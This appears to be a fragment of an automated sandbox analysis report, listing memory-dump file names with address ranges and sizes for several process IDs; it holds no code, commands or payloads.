memory/2088-55-0x00007FFB6C9E0000-0x00007FFB6D4A1000-memory.dmpFilesize
10.8MB
-
memory/3764-187-0x00007FFB6C9E0000-0x00007FFB6D4A1000-memory.dmpFilesize
10.8MB
-
memory/3764-179-0x0000023CB8800000-0x0000023CB8810000-memory.dmpFilesize
64KB
-
memory/3764-175-0x00007FFB6C9E0000-0x00007FFB6D4A1000-memory.dmpFilesize
10.8MB
-
memory/3764-180-0x0000023CB8800000-0x0000023CB8810000-memory.dmpFilesize
64KB
-
memory/3764-181-0x0000023CB8800000-0x0000023CB8810000-memory.dmpFilesize
64KB
-
memory/3764-177-0x0000023CB8800000-0x0000023CB8810000-memory.dmpFilesize
64KB
-
memory/4112-153-0x00007FFB6C9E0000-0x00007FFB6D4A1000-memory.dmpFilesize
10.8MB
-
memory/4112-124-0x000001E1AB970000-0x000001E1AB980000-memory.dmpFilesize
64KB
-
memory/4112-146-0x000001E1AB970000-0x000001E1AB980000-memory.dmpFilesize
64KB
-
memory/4112-125-0x000001E1AB970000-0x000001E1AB980000-memory.dmpFilesize
64KB
-
memory/4112-131-0x00007FFB6C9E0000-0x00007FFB6D4A1000-memory.dmpFilesize
10.8MB
-
memory/4504-154-0x00007FFB6C9E0000-0x00007FFB6D4A1000-memory.dmpFilesize
10.8MB
-
memory/4504-123-0x0000020FFD910000-0x0000020FFD920000-memory.dmpFilesize
64KB
-
memory/4504-119-0x00007FFB6C9E0000-0x00007FFB6D4A1000-memory.dmpFilesize
10.8MB
-
memory/4504-149-0x0000020FFD910000-0x0000020FFD920000-memory.dmpFilesize
64KB
-
memory/4504-147-0x0000020FFD910000-0x0000020FFD920000-memory.dmpFilesize
64KB
-
memory/4504-121-0x0000020FFD910000-0x0000020FFD920000-memory.dmpFilesize
64KB
-
memory/5024-20-0x00000249693E0000-0x00000249695FC000-memory.dmpFilesize
2.1MB
-
memory/5024-17-0x00000249692D0000-0x00000249692E0000-memory.dmpFilesize
64KB
-
memory/5024-16-0x00000249692D0000-0x00000249692E0000-memory.dmpFilesize
64KB
-
memory/5024-12-0x00000249692D0000-0x00000249692E0000-memory.dmpFilesize
64KB
-
memory/5024-21-0x00007FFB6C9E0000-0x00007FFB6D4A1000-memory.dmpFilesize
10.8MB
-
memory/5024-9-0x0000024950E50000-0x0000024950E72000-memory.dmpFilesize
136KB
-
memory/5024-10-0x00007FFB6C9E0000-0x00007FFB6D4A1000-memory.dmpFilesize
10.8MB